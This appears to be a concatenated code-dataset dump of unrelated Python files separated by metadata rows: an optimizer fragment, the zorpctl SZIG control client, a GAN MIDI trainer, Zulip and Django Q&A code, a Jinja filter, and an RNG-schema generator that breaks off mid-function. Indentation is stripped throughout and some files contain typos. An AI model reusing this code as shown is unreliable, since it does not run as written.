# Shape not good, reshape
(v, l)=self.reshape(Q=Q, R=R)
reshaped=True
# Origin for building the new simplex
x0[:]=self.simplex[0,:]
f0=self.simplexf[0]
# Build new simplex
for i in range(self.ndim):
self.simplex[i+1,:]=self.gridRestrain(v[i,:]+x0)
f=self.fun(self.simplex[i+1,:])
self.simplexf[i+1]=f
if self.debug:
DbgMsgOut("GRNMOPT", "Iteration i="+str(self.niter)+": reshape : f="+str(f))
self.simplexmoves[:]=0
# Do not order simplex here, even if reshape results in a point that improves over x0.
# The algorithm in the paper orders the simplex here. This is not in the sense of the
# Price-Coope-Byatt paper, which introduced pseudo-expand. Therefore do not sort.
# Centroid of the n worst points (or if a reshape took place - n new points)
xcw=self.simplex[1:,:].sum(0)/self.ndim
# Pseudo-expand point
xpe=self.gridRestrain(xb+(self.expand/self.reflect-1.0)*(xb-xcw))
fpe=self.fun(xpe)
if self.debug:
DbgMsgOut("GRNMOPT", "Iteration i="+str(self.niter)+": pseudo exp: f="+str(fpe))
# Check if there is any improvement
if fpe<fb:
# Pseudo-expand point is better than old best point
self.simplex[0,:]=xpe
self.simplexf[0]=fpe
self.simplexmoves[0]+=1
if self.debug:
DbgMsgOut("GRNMOPT", "Iteration i="+str(self.niter)+": accepted pseudo exp")
elif self.simplexf.min()<fb:
# One of the points obtained by reshape is better than old best point
if self.debug:
DbgMsgOut("GRNMOPT", "Iteration i="+str(self.niter)+": accepted reshape")
else:
# No improvement, enter shrink loop
# Even though we had a reshape the reshape did not improve the best point,
# and neither did pseudo-expand. This means that the best point before
# reshape is still the best point.
if not reshaped:
# No reshape yet, reshape now
(v, l)=self.reshape(Q=Q, R=R)
reshaped=True
# Origin for building the new simplex
x0[:]=self.simplex[0,:]
f0=self.simplexf[0]
self.simplexmoves[:]=0
if self.debug:
DbgMsgOut("GRNMOPT", "Iteration i="+str(self.niter)+": reshape")
# This is the first shrink step
shrink_step=0
else:
# This is the second shrink step
# (first one happened at reshape and failed to produce improvement)
shrink_step=1
# Shrink loop
while self.simplexf.min()>=f0:
# Reverse side vectors if this is not the first shrink step
if shrink_step>0:
v=-v
# If not first even shrink step, shrink vectors and check grid
if shrink_step>=2 and shrink_step % 2 == 0:
# Shrink vectors
v=v*self.shrink
l=l*self.shrink
if self.debug:
DbgMsgOut("GRNMOPT", "Iteration i="+str(self.niter)+": shrink vectors")
# Find shortest side vector
i=argsort(l, 0, 'mergesort')
lmin=l[i[0]]
vmin=v[i[0],:]
# Do we need a new grid?
if lmin < self.lam*sqrt(self.ndim)*sqrt((self.delta**2).sum())/2:
# New grid origin
self.z=x0
# New (refined) grid density
vmin_norm=sqrt((vmin**2).sum())/sqrt(self.ndim)
abs_vmin=abs(vmin)
deltaprime=1.0/(250*self.lam*self.ndim)*where(abs_vmin>vmin_norm, abs_vmin, vmin_norm)
# Enforce continuity bound on density
contbound_r=abs(self.z)*self.tau_r
contbound=where(contbound_r>self.tau_a, contbound_r, self.tau_a)
deltanew=where(deltaprime>contbound, deltaprime, contbound)
# Update grid density
self.delta=where(deltanew<self.delta, deltanew, self.delta)
if self.debug:
DbgMsgOut("GRNMOPT", "Iteration i="+str(self.niter)+": refine grid")
# Evaluate points
self.simplex[1:,:]=x0+v
for i in range(self.ndim):
self.simplex[i+1,:]=self.gridRestrain(x0+v[i,:])
f=self.fun(self.simplex[i+1,:])
self.simplexf[i+1]=f
if self.debug:
DbgMsgOut("GRNMOPT", "Iteration i="+str(self.niter)+(": shrink %1d: f=" % (shrink_step % 2))+str(f))
# self._checkSimplex()
# self._plotSimplex()
# if f0!=self.simplexf[0] or (x0!=self.simplex[0,:]).any():
# raise Exception, "x0, f0 not matching."
# Stopping condition
if (self.checkFtol() and self.checkXtol()) or self.stop:
break
# Increase shrink step counter
shrink_step+=1
# Check stopping condition
if self.checkFtol() and self.checkXtol():
if self.debug:
DbgMsgOut("GRNMOPT", "Iteration i="+str(self.niter)+": simplex x and f tolerance reached, stopping.")
break
# Debug message
if self.debug:
DbgMsgOut("GRNMOPT", "Finished.")
#
# Internal functions for debugging purposes
#
def _checkSimplex(self):
"""
Check if the approximate cost function values corresponding to simplex
points are correct.
"""
for i in range(0, self.ndim+1):
ff=self.simplexf[i]
f=self.fun(self.simplex[i,:], False)
if ff!=f and self.debug:
DbgMsgOut("GRNMOPT", "Simplex consistency broken for member #"+str(i))
raise Exception, ""
def _checkLogDet(self):
"""
Check if the natural logarithm of the simplex side vectors is correct.
"""
(v,l)=self.sortedSideVectors()
vdet=abs(det(v))
DbgMsgOut("GRNMOPT", " logDet="+str(exp(self.logDet))+" vdet="+str(vdet))
if (1.0-exp(self.logDet)/vdet)>1e-3:
raise Exception, DbgMsG("GRNMOPT", "Simplex determinat consistency broken. Relative error: %e" % (1.0-exp(self.logDet)/vdet))
def _plotSimplex(self):
"""
Plot the projection of simplex side vectors to the first two dimensions.
"""
p1=self.simplex[0,:2]
p2=self.simplex[1,:2]
p3=self.simplex[2,:2]
pl.clf()
pl.hold(True)
pl.plot([p1[0]], [p1[1]], 'ro')
pl.plot([p2[0]], [p2[1]], 'go')
pl.plot([p3[0]], [p3[1]], 'bo')
pl.plot([p1[0], p2[0]], [p1[1], p2[1]], 'b')
pl.plot([p1[0], p3[0]], [p1[1], p3[1]], 'b')
pl.axis('equal')
pl.hold(False)
pl.show()
| gpl-3.0 | 1,669,439,199,081,266,000 | 29.594203 | 128 | 0.646508 | false | 2.979301 | false | false | false |
mochrul/zorp | zorpctl/szig.py | 1 | 8178 | ############################################################################
##
## Copyright (c) 2000-2015 BalaBit IT Ltd, Budapest, Hungary
## Copyright (c) 2015-2018 BalaSys IT Ltd, Budapest, Hungary
##
##
## This program is free software; you can redistribute it and/or modify
## it under the terms of the GNU General Public License as published by
## the Free Software Foundation; either version 2 of the License, or
## (at your option) any later version.
##
## This program is distributed in the hope that it will be useful,
## but WITHOUT ANY WARRANTY; without even the implied warranty of
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
## GNU General Public License for more details.
##
## You should have received a copy of the GNU General Public License along
## with this program; if not, write to the Free Software Foundation, Inc.,
## 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
##
############################################################################
import socket
from zorpctl.SZIGMessages import (
MessageAuthorizeAccept, MessageAuthorizeReject,
MessageGetChild, MessageGetDeadLockCheck,
MessageGetLogLevel, MessageGetLogSpec,
MessageGetSibling, MessageGetValue,
MessageReload, MessageReloadResult,
MessageSetDeadLockCheck, MessageSetLogLevel,
MessageSetLogSpec, MessageStopSession
)
from zorpctl.ZorpctlConf import ZorpctlConfig
class Response(object):
def __init__(self, succeeded, value = None):
self.is_succeeded = succeeded
self.value = value
class ResponseDeadlockCheck(Response):
def isSet(self):
return self.value == "1"
class Handler(object):
"""
Class created for handling messages sent by Szig to Zorp
and receiving answer from Zorp
"""
_success_prefix = "OK "
_fail_prefix = "FAIL "
def __init__(self, server_address):
self.max_command_length = 4096
self.response_length = 4096
self.socket = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
self.server_address = server_address
try:
self.socket.connect(self.server_address)
except IOError as e:
e.message = "Socket not found, %s" % server_address
raise e
def talk(self, message):
"""
Sends an instance of Message and
returns the response as Response class
"""
self.send(message)
return self.recv()
def send(self, message):
"""
Sending a message to Zorp.
Messages can be derived from abstract Message class.
"""
self._write_request(str(message))
def recv(self):
"""
Returns an instance of Response class.
"""
resp = self._read_response()
return Response(self._isSucceeded(resp), self._cutPrefix(resp))
def _write_request(self, request):
"""
Writing a command message to a Unix Domain Socket
to communicate with Zorp.
Raises SZIGError if not all the data has been sent.
SZIGError value is a tuple of sent/all
"""
request_length = len(request)
if request_length > self.max_command_length:
raise SZIGError("Given request is longer than %s" % self.max_command_length)
sent_data_length = self.socket.send(request)
if sent_data_length < request_length:
msg = "There was an error while sending the request (%s/%s)!" % (sent_data_length, request_length)
raise SZIGError(msg, (sent_data_length, request_length))
def _read_response(self, resp_len = None):
"""
Reading from a Unix Domain Socket
to communicate with Zorp.
"""
if not resp_len:
resp_len = self.response_length
if resp_len < 1:
raise SZIGError("Response length should be greater than 0")
response = self.socket.recv(resp_len)
if not response:
raise SZIGError("There was an error while receiving the answer!")
return response[:-1] if response[-1:] == '\n' else response
def _isSucceeded(self, response):
"""
Method for checking if Zorp understood
the given request by inspecting the response.
"""
return response[:len(self._success_prefix)] == self._success_prefix
def _cutPrefix(self, string):
"""
Cuts the defined prefix from a string.
"""
if string[:len(self._success_prefix)] == self._success_prefix:
string = string[len(self._success_prefix):]
else:
if string[:len(self._fail_prefix)] == self._fail_prefix:
string = string[len(self._fail_prefix):]
return string
class SZIG(object):
def __init__(self, process_name, handler=None):
ZORPCTLCONF = ZorpctlConfig.Instance()
self.pidfile_dir = ZORPCTLCONF['ZORP_PIDFILEDIR']
if not handler:
handler = Handler
self.handler = handler(self.pidfile_dir + '/zorpctl.' + process_name)
def get_value(self, key):
response = self.handler.talk(MessageGetValue(key))
return None if response.value == "None" else response.value
def get_sibling(self, node):
response = self.handler.talk(MessageGetSibling(node))
return None if response.value == "None" else response.value
def get_child(self, node):
response = self.handler.talk(MessageGetChild(node))
return None if response.value == "None" else response.value
@property
def loglevel(self):
self.handler.send(MessageGetLogLevel())
return int(self.handler.recv().value)
@loglevel.setter
def loglevel(self, value):
self.handler.send(MessageSetLogLevel(value))
if not self.handler.recv().is_succeeded:
raise SZIGError("Log level has not been set.")
@property
def logspec(self):
self.handler.send(MessageGetLogSpec())
return self.handler.recv().value
@logspec.setter
def logspec(self, value):
"""
Setting LOGSPEC expecting a log specification
string as value
"""
self.handler.send(MessageSetLogSpec(value))
if not self.handler.recv().is_succeeded:
raise SZIGError("Log specification has not been set.")
@property
def deadlockcheck(self):
self.handler.send(MessageGetDeadLockCheck())
dlc = self.handler.recv()
dlc.__class__ = ResponseDeadlockCheck
return dlc.isSet()
@deadlockcheck.setter
def deadlockcheck(self, value):
"""
Sets Deadlock Check, expects a boolean as value.
"""
self.handler.talk(MessageSetDeadLockCheck(value))
def reload(self):
self.handler.talk(MessageReload())
def reload_result(self):
result = self.handler.talk(MessageReloadResult())
return result.is_succeeded
def stop_session(self, instance):
response = self.handler.talk(MessageStopSession(instance))
if not response.is_succeeded:
raise SZIGError("Session stop failed! Response was: %s" % response.value)
def authorize_accept(self, session_id, description):
response = self.handler.talk(MessageAuthorizeAccept(session_id, description))
if not response.is_succeeded:
raise SZIGError(response.value)
return response.value
def authorize_reject(self, session_id, description):
response = self.handler.talk(MessageAuthorizeReject(session_id, description))
if not response.is_succeeded:
raise SZIGError(response.value)
return response.value
def stop_session(self, session_id):
response = self.handler.talk(MessageStopSession(session_id))
if not response.is_succeeded:
raise SZIGError(response.value)
return response.value
class SZIGError(Exception):
"""
Exception Class created for Szig specific errors.
"""
def __init__(self, msg, value = None):
self.msg = msg
self.value = value
def __str__(self):
return self.msg + repr(self.value)
| gpl-2.0 | -1,081,902,390,154,030,700 | 32.793388 | 110 | 0.627782 | false | 4.124054 | false | false | false |
xi-studio/anime | src/gan_midi.py | 1 | 8075 | import os, sys
sys.path.append(os.getcwd())
import time
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
import numpy as np
import sklearn.datasets
import tensorflow as tf
import tflib as lib
import tflib.ops.linear
import tflib.ops.conv2d
import tflib.ops.batchnorm
import tflib.ops.deconv2d
import tflib.save_images
import tflib.midi
import tflib.plot
MODE = 'wgan-gp' # dcgan, wgan, or wgan-gp
DIM = 30 # Model dimensionality
BATCH_SIZE = 10 # Batch size
CRITIC_ITERS = 5 # For WGAN and WGAN-GP, number of critic iters per gen iter
LAMBDA = 10 # Gradient penalty lambda hyperparameter
ITERS = 200000 # How many generator iterations to train for
OUTPUT_DIM = 100*88 # Number of pixels in MNIST (28*28)
lib.print_model_settings(locals().copy())
def LeakyReLU(x, alpha=0.2):
return tf.maximum(alpha*x, x)
def ReLULayer(name, n_in, n_out, inputs):
output = lib.ops.linear.Linear(
name+'.Linear',
n_in,
n_out,
inputs,
initialization='he'
)
return tf.nn.relu(output)
def LeakyReLULayer(name, n_in, n_out, inputs):
output = lib.ops.linear.Linear(
name+'.Linear',
n_in,
n_out,
inputs,
initialization='he'
)
return LeakyReLU(output)
def Generator(n_samples, noise=None):
if noise is None:
noise = tf.random_normal([n_samples, 128])
output = lib.ops.linear.Linear('Generator.Input', 128, 13*11*4*DIM, noise)
if MODE == 'wgan':
output = lib.ops.batchnorm.Batchnorm('Generator.BN1', [0], output)
output = tf.nn.relu(output)
output = tf.reshape(output, [-1, 4*DIM, 13, 11])
output = lib.ops.deconv2d.Deconv2D('Generator.2', 4*DIM, 2*DIM, 5, output)
if MODE == 'wgan':
output = lib.ops.batchnorm.Batchnorm('Generator.BN2', [0,2,3], output)
output = tf.nn.relu(output)
output = output[:,:,:25,:]
output = lib.ops.deconv2d.Deconv2D('Generator.3', 2*DIM, DIM, 5, output)
if MODE == 'wgan':
output = lib.ops.batchnorm.Batchnorm('Generator.BN3', [0,2,3], output)
output = tf.nn.relu(output)
output = lib.ops.deconv2d.Deconv2D('Generator.5', DIM, 1, 5, output)
output = tf.nn.sigmoid(output)
return tf.reshape(output, [-1, OUTPUT_DIM])
def Discriminator(inputs):
output = tf.reshape(inputs, [-1, 1, 100, 88])
output = lib.ops.conv2d.Conv2D('Discriminator.1',1,DIM,5,output,stride=2)
output = LeakyReLU(output)
output = lib.ops.conv2d.Conv2D('Discriminator.2', DIM, 2*DIM, 5, output, stride=2)
if MODE == 'wgan':
output = lib.ops.batchnorm.Batchnorm('Discriminator.BN2', [0,2,3], output)
output = LeakyReLU(output)
output = lib.ops.conv2d.Conv2D('Discriminator.3', 2*DIM, 4*DIM, 5, output, stride=2)
if MODE == 'wgan':
output = lib.ops.batchnorm.Batchnorm('Discriminator.BN3', [0,2,3], output)
output = LeakyReLU(output)
output = tf.reshape(output, [-1, 13*11*4*DIM])
output = lib.ops.linear.Linear('Discriminator.Output', 13*11*4*DIM, 1, output)
return tf.reshape(output, [-1])
real_data = tf.placeholder(tf.float32, shape=[BATCH_SIZE, OUTPUT_DIM])
fake_data = Generator(BATCH_SIZE)
disc_real = Discriminator(real_data)
disc_fake = Discriminator(fake_data)
gen_params = lib.params_with_name('Generator')
disc_params = lib.params_with_name('Discriminator')
if MODE == 'wgan':
gen_cost = -tf.reduce_mean(disc_fake)
disc_cost = tf.reduce_mean(disc_fake) - tf.reduce_mean(disc_real)
gen_train_op = tf.train.RMSPropOptimizer(
learning_rate=5e-5
).minimize(gen_cost, var_list=gen_params)
disc_train_op = tf.train.RMSPropOptimizer(
learning_rate=5e-5
).minimize(disc_cost, var_list=disc_params)
clip_ops = []
for var in lib.params_with_name('Discriminator'):
clip_bounds = [-.01, .01]
clip_ops.append(
tf.assign(
var,
tf.clip_by_value(var, clip_bounds[0], clip_bounds[1])
)
)
clip_disc_weights = tf.group(*clip_ops)
elif MODE == 'wgan-gp':
gen_cost = -tf.reduce_mean(disc_fake)
disc_cost = tf.reduce_mean(disc_fake) - tf.reduce_mean(disc_real)
alpha = tf.random_uniform(
shape=[BATCH_SIZE,1],
minval=0.,
maxval=1.
)
differences = fake_data - real_data
interpolates = real_data + (alpha*differences)
gradients = tf.gradients(Discriminator(interpolates), [interpolates])[0]
slopes = tf.sqrt(tf.reduce_sum(tf.square(gradients), reduction_indices=[1]))
gradient_penalty = tf.reduce_mean((slopes-1.)**2)
disc_cost += LAMBDA*gradient_penalty
gen_train_op = tf.train.AdamOptimizer(
learning_rate=1e-4,
beta1=0.5,
beta2=0.9
).minimize(gen_cost, var_list=gen_params)
disc_train_op = tf.train.AdamOptimizer(
learning_rate=1e-4,
beta1=0.5,
beta2=0.9
).minimize(disc_cost, var_list=disc_params)
clip_disc_weights = None
elif MODE == 'dcgan':
gen_cost = tf.reduce_mean(tf.nn.sigmoid_cross_entropy_with_logits(
disc_fake,
tf.ones_like(disc_fake)
))
disc_cost = tf.reduce_mean(tf.nn.sigmoid_cross_entropy_with_logits(
disc_fake,
tf.zeros_like(disc_fake)
))
disc_cost += tf.reduce_mean(tf.nn.sigmoid_cross_entropy_with_logits(
disc_real,
tf.ones_like(disc_real)
))
disc_cost /= 2.
gen_train_op = tf.train.AdamOptimizer(
learning_rate=2e-4,
beta1=0.5
).minimize(gen_cost, var_list=gen_params)
disc_train_op = tf.train.AdamOptimizer(
learning_rate=2e-4,
beta1=0.5
).minimize(disc_cost, var_list=disc_params)
clip_disc_weights = None
# For saving samples
fixed_noise = tf.constant(np.random.normal(size=(20, 128)).astype('float32'))
fixed_noise_samples = Generator(20, noise=fixed_noise)
def generate_image(frame, true_dist):
samples = session.run(fixed_noise_samples)
lib.save_images.save_images(
samples.reshape((20, 100, 88)),
'../data/midi_img/samples_{}.png'.format(frame)
)
# Dataset iterator
train_gen, dev_gen, test_gen = lib.midi.load(BATCH_SIZE, BATCH_SIZE)
def inf_train_gen():
while True:
for images,targets in train_gen():
yield images
# Train loop
saver = tf.train.Saver()
with tf.device('/gpu:0'):
with tf.Session() as session:
session.run(tf.initialize_all_variables())
gen = inf_train_gen()
for iteration in xrange(ITERS):
start_time = time.time()
if iteration > 0:
_ = session.run(gen_train_op)
if MODE == 'dcgan':
disc_iters = 1
else:
disc_iters = CRITIC_ITERS
for i in xrange(disc_iters):
_data = gen.next()
_disc_cost, _ = session.run(
[disc_cost, disc_train_op],
feed_dict={real_data: _data}
)
if clip_disc_weights is not None:
_ = session.run(clip_disc_weights)
lib.plot.plot('train disc cost', _disc_cost)
lib.plot.plot('time', time.time() - start_time)
# Calculate dev loss and generate samples every 100 iters
if iteration % 100 == 99:
dev_disc_costs = []
for images,_ in dev_gen():
_dev_disc_cost = session.run(
disc_cost,
feed_dict={real_data: images}
)
dev_disc_costs.append(_dev_disc_cost)
lib.plot.plot('dev disc cost', np.mean(dev_disc_costs))
if iteration % 1000 == 999:
generate_image(iteration, _data)
saver.save(session, '../data/model/midi_model', global_step=iteration)
# Write logs every 100 iters
if (iteration < 5) or (iteration % 100 == 99):
lib.plot.flush()
lib.plot.tick()
| mit | 3,840,381,744,454,263,300 | 30.29845 | 88 | 0.600495 | false | 3.185404 | false | false | false |
rishig/zulip | zilencer/management/commands/calculate_first_visible_message_id.py | 7 | 1109 | from typing import Any
from django.core.management.base import CommandParser
from zerver.lib.management import ZulipBaseCommand
from zerver.lib.message import maybe_update_first_visible_message_id
from zerver.models import Realm
class Command(ZulipBaseCommand):
help = """Calculate the value of first visible message ID and store it in cache"""
def add_arguments(self, parser: CommandParser) -> None:
self.add_realm_args(parser)
parser.add_argument(
'--lookback-hours',
dest='lookback_hours',
type=int,
help="Period a bit larger than that of the cron job that runs "
"this command so that the lookback periods are sure to overlap.",
required=True,
)
def handle(self, *args: Any, **options: Any) -> None:
target_realm = self.get_realm(options)
if target_realm is None:
realms = Realm.objects.all()
else:
realms = [target_realm]
for realm in realms:
maybe_update_first_visible_message_id(realm, options['lookback_hours'])
| apache-2.0 | -6,301,169,526,633,900,000 | 32.606061 | 86 | 0.64202 | false | 4.169173 | false | false | false |
amirnissim/okqa | qa/views.py | 1 | 9701 | import json
from django.http import HttpResponse, HttpResponseForbidden
from django.http import HttpResponseRedirect
from django.shortcuts import render, get_object_or_404
from django.views.decorators.http import require_POST
from django.template.context import RequestContext
from django.contrib.auth.decorators import login_required
from django.utils.translation import ugettext as _
from django.contrib.syndication.views import Feed
from django.utils.feedgenerator import Atom1Feed
from django.contrib import messages
from django.conf import settings
from django.views.generic.detail import SingleObjectTemplateResponseMixin, BaseDetailView
from qa.forms import AnswerForm, QuestionForm
from .models import *
from qa.mixins import JSONResponseMixin
from user.views import edit_profile
# the order options for the list views
ORDER_OPTIONS = {'date': '-created_at', 'rating': '-rating'}
class JsonpResponse(HttpResponse):
def __init__(self, data, callback, *args, **kwargs):
jsonp = "%s(%s)" % (callback, json.dumps(data))
super(JsonpResponse, self).__init__(
content=jsonp,
content_type='application/javascript',
*args, **kwargs)
def questions(request, entity_slug=None, entity_id=None, tags=None):
"""
list questions ordered by number of upvotes
"""
# TODO: cache the next lines
if entity_id:
entity = Entity.objects.get(pk=entity_id)
else:
entity = Entity.objects.get(slug=entity_slug)
questions = Question.on_site.filter(entity=entity)
context = {'entity': entity}
order_opt = request.GET.get('order', 'rating')
order = ORDER_OPTIONS[order_opt]
if tags:
tags_list = tags.split(',')
questions = questions.filter(tags__name__in=tags_list)
context['current_tags'] = tags_list
questions = questions.order_by(order)
# TODO: revive the tags!
# context['tags'] = TaggedQuestion.on_site.values('tag__name').annotate(count=Count("tag"))
context['questions'] = questions
context['by_date'] = order_opt == 'date'
context['by_rating'] = order_opt == 'rating'
return render(request, "qa/question_list.html", RequestContext(request, context))
class QuestionDetail(JSONResponseMixin, SingleObjectTemplateResponseMixin, BaseDetailView):
model = Question
template_name = 'qa/question_detail.html'
context_object_name = 'question'
slug_field = 'unislug'
def get_context_data(self, **kwargs):
context = super(QuestionDetail, self).get_context_data(**kwargs)
context['max_length_a_content'] = MAX_LENGTH_A_CONTENT
context['answers'] = self.object.answers.all()
context['entity'] = self.object.entity
can_answer = self.object.can_answer(self.request.user)
context['can_answer'] = can_answer
if can_answer:
try:
user_answer = self.object.answers.get(author=self.request.user)
context['my_answer_form'] = AnswerForm(instance=user_answer)
context['my_answer_id'] = user_answer.id
except self.object.answers.model.DoesNotExist:
context['my_answer_form'] = AnswerForm()
if self.request.user.is_authenticated() and \
not self.request.user.upvotes.filter(question=self.object).exists():
context['can_upvote'] = True
else:
context['can_upvote'] = False
return context
def render_to_response(self, context):
# Look for a 'format=json' GET argument
if self.request.GET.get('format', 'html') == 'json' or self.request.is_ajax():
data = {
'question': {
'subject': self.object.subject,
'content': self.object.content,
'author': self.object.author.username
}
}
return JSONResponseMixin.render_to_response(self, data)
else:
return SingleObjectTemplateResponseMixin.render_to_response(self, context)
@login_required
def post_answer(request, q_id):
context = {}
question = Question.objects.get(id=q_id)
if not question.can_answer(request.user):
return HttpResponseForbidden(_("You must be logged in as a candidate to post answers"))
try:
# make sure the user haven't answered already
answer = question.answers.get(author=request.user)
except question.answers.model.DoesNotExist:
answer = Answer(author=request.user, question=question)
answer.content = request.POST.get("content")
answer.save()
return HttpResponseRedirect(question.get_absolute_url())
@login_required
def post_q_router(request):
user = request.user
if user.is_anonymous():
return HttpResponseRedirect(settings.LOGIN_URL)
else:
profile = user.profile
entity_slug = profile.locality and profile.locality.slug
if entity_slug:
return HttpResponseRedirect(reverse(post_question, args=(entity_slug, )))
else:
# user must set locality
return HttpResponseRedirect(reverse(edit_profile))
@login_required
def post_question(request, entity_slug, slug=None):
entity = Entity.objects.get(slug=entity_slug)
if slug:
q = get_object_or_404(Question, unislug=slug, entity=entity)
if request.method == "POST":
form = QuestionForm(request.POST)
if form.is_valid():
if slug:
if q.author != request.user:
return HttpResponseForibdden(_("You can only edit your own questions."))
if q.answers.count():
return HttpResponseForbidden(_("Question has been answered, editing disabled."))
question = q
question.subject = form.cleaned_data.get('subject', "")
question.save()
else:
question = form.save(commit=False)
question.author = request.user
question.entity = entity
question.save()
form.save_m2m()
return HttpResponseRedirect(question.get_absolute_url())
else:
if slug:
subject = q.subject
else:
subject = ""
form = QuestionForm(initial={'entity': entity, 'subject': subject})
context = RequestContext(request, {"form": form,
"entity": entity,
"max_length_q_subject": MAX_LENGTH_Q_SUBJECT,
"slug": slug,
})
return render(request, "qa/post_question.html", context)
@login_required
def upvote_question(request, q_id):
if request.method == "POST":
q = get_object_or_404(Question, id=q_id)
user = request.user
if q.author == user or user.upvotes.filter(question=q):
return HttpResponseForbidden(_("You already upvoted this question"))
else:
upvote = QuestionUpvote.objects.create(question=q, user=user)
#TODO: use signals so the next line won't be necesary
new_count = increase_rating(q)
return HttpResponse(new_count)
else:
return HttpResponseForbidden(_("Use POST to upvote a question"))
@transaction.commit_on_success
def increase_rating(q):
q = Question.objects.get(id=q.id)
q.rating += 1
q.save()
return q.rating
class RssQuestionFeed(Feed):
"""Simple feed to get all questions"""
title = _('OK QA Question Feed')
link = "/"
description = _('Questions from OKQA')
def items(self):
return Question.objects.order_by('-updated_at')
def item_title(self, item):
return item.subject
def item_description(self, item):
return item.content
class AtomQuestionFeed(RssQuestionFeed):
feed_type = Atom1Feed
subtitle = RssQuestionFeed.description
class RssQuestionAnswerFeed(Feed):
""""Give question, get all answers for that question"""
def get_object(self, request, q_id):
return get_object_or_404(Question, pk=q_id)
def title(self, obj):
return _('Answers for the question') + ' "%s' % obj.subject + '"'
def link(self, obj):
return obj.get_absolute_url()
def description(self, obj):
return _('A feed of all answers for the question') + ' "%s' % obj.subject + '"'
def items(self, obj):
return Answer.objects.filter(question=obj).order_by('-updated_at')
class AtomQuestionAnswerFeed(RssQuestionAnswerFeed):
feed_type = Atom1Feed
subtitle = RssQuestionAnswerFeed.description
@require_POST
def flag_question(request, q_id):
q = get_object_or_404(Question, id=q_id)
user = request.user
ret = {}
if user.is_anonymous():
messages.error(request, _('Sorry, you have to login to flag questions'))
ret["redirect"] = '%s?next=%s' % (settings.LOGIN_URL, q.get_absolute_url())
elif (user.profile.is_editor and user.profile.locality == q.entity) or (user == q.author and not q.answers.all()):
q.delete()
messages.info(request, _('Question has been removed'))
ret["redirect"] = reverse('qna', args=(q.entity.slug,))
elif user.flags.filter(question=q):
ret["message"] = _('Thanks. You already reported this question')
else:
flag = QuestionFlag.objects.create(question=q, reporter=user)
#TODO: use signals so the next line won't be necesary
q.flagged()
ret["message"] = _('Thank you for falgging the question. One of our editors will look at it shortly.')
return HttpResponse(json.dumps(ret), content_type="application/json")
| bsd-3-clause | 4,962,761,711,069,016,000 | 34.276364 | 118 | 0.633749 | false | 4.032003 | false | false | false |
ondrae/1900 | filters.py | 1 | 1543 | from datetime import datetime
import jinja2
import flask
blueprint = flask.Blueprint('filters', __name__)
# http://flask.pocoo.org/snippets/33/
# and
# http://stackoverflow.com/questions/12288454/how-to-import-custom-jinja2-filters-from-another-file-and-using-flask
@jinja2.contextfilter
@blueprint.app_template_filter("timesince")
def friendly_time(context, dt, past_="ago",
future_="from now",
default="just now"):
"""
Returns string representing "time since"
or "time until" e.g.
3 days ago, 5 hours from now etc.
"""
now = datetime.utcnow()
try:
trimmed_time = dt[:19]
dt = datetime.strptime(trimmed_time, "%Y-%m-%d %H:%M:%S")
except:
pass
try:
# Thu, 26 Feb 2015 03:45:21 GMT
dt = datetime.strptime(dt, "%a, %d %b %Y %H:%M:%S %Z")
except:
pass
if now > dt:
diff = now - dt
dt_is_past = True
else:
diff = dt - now
dt_is_past = False
periods = (
(diff.days / 365, "year", "years"),
(diff.days / 30, "month", "months"),
(diff.days / 7, "week", "weeks"),
(diff.days, "day", "days"),
(diff.seconds / 3600, "hour", "hours"),
(diff.seconds / 60, "minute", "minutes"),
(diff.seconds, "second", "seconds"),
)
for period, singular, plural in periods:
if period:
return "%d %s %s" % (period, \
singular if period == 1 else plural, \
past_ if dt_is_past else future_)
return default | mit | 6,174,330,437,350,917,000 | 26.087719 | 115 | 0.558004 | false | 3.428889 | false | false | false |
sbmlteam/deviser | generator/util/generateRNG.py | 1 | 3682 | #!/usr/bin/env python
#
# @file generateRNG.py
# @brief function for generating RNG schema
# @author Frank Bergmann
# @author Sarah Keating
#
# <!--------------------------------------------------------------------------
#
# Copyright (c) 2013-2018 by the California Institute of Technology
# (California, USA), the European Bioinformatics Institute (EMBL-EBI, UK)
# and the University of Heidelberg (Germany), with support from the National
# Institutes of Health (USA) under grant R01GM070923. All rights reserved.
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
# DEALINGS IN THE SOFTWARE.
#
# Neither the name of the California Institute of Technology (Caltech), nor
# of the European Bioinformatics Institute (EMBL-EBI), nor of the University
# of Heidelberg, nor the names of any contributors, may be used to endorse
# or promote products derived from this software without specific prior
# written permission.
# ------------------------------------------------------------------------ -->
"""Function for generating RNG schema"""
import sys
from ..parseXML import ParseXML
from ..util import global_variables as gv
from ..validation import RNGSchemaFiles
def generate_rng_for(filename): # , overwrite=True):
"""
Parse XML file and then invokes RNG file generation code.
:param filename: the XML file to parse
:return: returns nothing.
"""
gv.running_tests = False
parser = ParseXML.ParseXML(filename)
ob = dict()
if gv.code_returned == gv.return_codes['success']:
# catch a problem in the parsing
try:
ob = parser.parse_deviser_xml()
except Exception:
gv.code_returned = gv.return_codes['parsing error']
if gv.code_returned == gv.return_codes['success']:
# try:
if gv.is_package:
generate_rng(ob)
# except Exception :
# gv.code_returned = gv.return_codes['unknown error - please report']
def generate_rng(ob):
"""
Wrapper function. Creates RNG Schema file.
:param ob: the big dictionary object produced by XML file parsing.
:return: returns nothing.
"""
ex = RNGSchemaFiles.RNGSchemaFiles(ob)
ex.write_file()
def main(args):
"""
Checks correct number of arguments and then invokes RNG code.
"""
if len(args) != 2:
